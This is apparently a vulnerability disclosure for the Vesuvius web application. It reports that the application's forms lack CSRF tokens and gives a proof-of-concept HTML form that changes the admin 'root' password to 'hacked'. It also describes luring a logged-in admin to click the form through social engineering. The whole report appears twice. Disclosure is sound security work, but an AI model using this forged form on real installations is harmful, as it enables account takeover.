I checked security of Vesuvius and found a critical vulnerability. Vesuvius forms don't have CSRF tokens...!!! This allows someone to submit vesuvius forms from any webpage outside vesuvius.
for an example if an attacker wants to change the password of the user "root", the attacker can change it by following the steps below.
host a website and create the following form on a webpage.
< form method="post"
action="http://localhost/vesuvius/www/admin?passwdp&tabid=5" name="form0">
< input type="hidden" name="user" value="1">
< input type="hidden" name="password" value="hacked">
< input type="hidden" name="re_password" value="hacked">
< input type="submit" value="Click Here">< /form>
note: form action changes according to the web address of vesuvius
send the link of the webpage to vesuvius admin and make admin clicks the button. If admin clicks the button while he is logged in to vesuvius, the password of the user "root" will be changed to "hacked" immediately...!!!
With a bit of social engineering this can be achieved easily.
I checked security of Vesuvius and found a critical vulnerability. Vesuvius forms don't have CSRF tokens...!!! This allows someone to submit vesuvius forms from any webpage outside vesuvius.
for an example if an attacker wants to change the password of the user "root", the attacker can change it by following the steps below.
host a website and create the following form on a webpage. < form method="post" action="http://localhost/vesuvius/www/admin?passwdp&tabid=5" name="form0"> < input type="hidden" name="user" value="1"> < input type="hidden" name="password" value="hacked"> < input type="hidden" name="re_password" value="hacked"> < input type="submit" value="Click Here">< /form>
note: form action changes according to the web address of vesuvius
send the link of the webpage to vesuvius admin and make admin clicks the button. If admin clicks the button while he is logged in to vesuvius, the password of the user "root" will be changed to "hacked" immediately...!!!
With a bit of social engineering this can be achieved easily.